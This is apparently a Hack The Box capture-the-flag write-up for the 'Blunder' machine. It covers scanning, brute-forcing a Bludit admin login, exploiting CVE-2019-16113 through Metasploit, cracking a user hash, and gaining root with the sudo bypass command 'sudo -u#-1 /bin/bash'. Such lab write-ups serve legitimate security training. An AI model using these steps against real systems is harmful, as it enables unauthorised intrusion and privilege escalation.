Hack The Box — Blunder Write-up

Sometimes it is in front of your 👀 Blunder

Enumeration

Begin with

nmap -sC -sT -sV 10.10.10.191 

(Script Scan, TCP Connect Scan, and Service Version Detection) to find the services on this machine. There is the only HTTP.

Note:

  • sC Used the default script that provides by Nmap.
  • sT TCP full scan, this is the case when a user does not have raw packet privileges.
  • sV Determined the version to find CVE.

The web page

I decided to use DirBuster to enumerate directories.

There is the result. I interested in

/todo.txt 
/robots.txt
/admin
/about
/usb

There is /admin. I found the way to gain access.

I searched the GitHub for brute force the password of BLUDIT (todo.txt have “-Inform fergus that the new blog needs images — PENDING”). The username is fergus.

Bludit is a web application to build your own website or blog in seconds, it’s completely free and open-source. Markdown support.

You need to modify the Python code to support your wordlists.txt until you got the password.

Note: cewl — Custom wordlist generator

Gaining Access

After you get the correct password, next is finding the additional information there is CVE or not.

CVE-2019–16113 Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can insert with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname. I decided to use Metasploit for CVE vulnerability.

Setup the username, password, and target IP then exploit.

Enumeration with user privilege

After I got a shell (www-data), I tried to find a user password to gain a user shell.

I found the password that kept in users.php in hash form.

I cracked the password from the hash and got Password120.

I need to find the user who used the password (Password120), then I went to /home directory to find the user and got hugo and shaun. I tried with hugo and that it. Hugo used Password120 as a password.

Got user.txt!

Privilege Escalation

I wanted to use the bash shell on Meterpreter by Python command as following. After that, I found the sudo 1.8.27 — Security Bypass in exploit-db.com.

Sudo does not check for the existence of the specified user id and executes the with arbitrary user id with the sudo privilege.

By typing

sudo -u#-1 /bin/bash 

to become root

Got root.txt!

Click this picture to buy me a coffee

If my write-up is useful for you, would you mind buying me a coffee?

Cybersecurity Consultant & Penetration Tester